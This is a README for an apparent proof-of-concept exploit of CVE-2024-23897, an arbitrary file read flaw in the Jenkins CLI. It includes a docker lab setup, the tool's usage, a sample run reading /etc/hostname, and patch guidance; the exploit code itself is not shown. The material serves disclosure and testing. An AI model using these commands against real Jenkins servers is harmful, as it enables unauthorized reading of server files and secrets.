# Jenkins CVE-2024-23897 PoC

A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.

**Affected Versions**

- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2

## Set up a vulnerable instance

Spin up a local vulnerable instance using docker compose:

cd docker
docker compose up -d

The instance will be available at `http://localhost:1234`

## Exploitation

โฏ python --help
usage: [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)


โฏ python --url '' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...

ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability take at a look at my [blog post on the topic](

## Fix

- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](

## Related Links

- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](
- [Jenkins Security Advisory - 2024-01-24](
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability โ€“](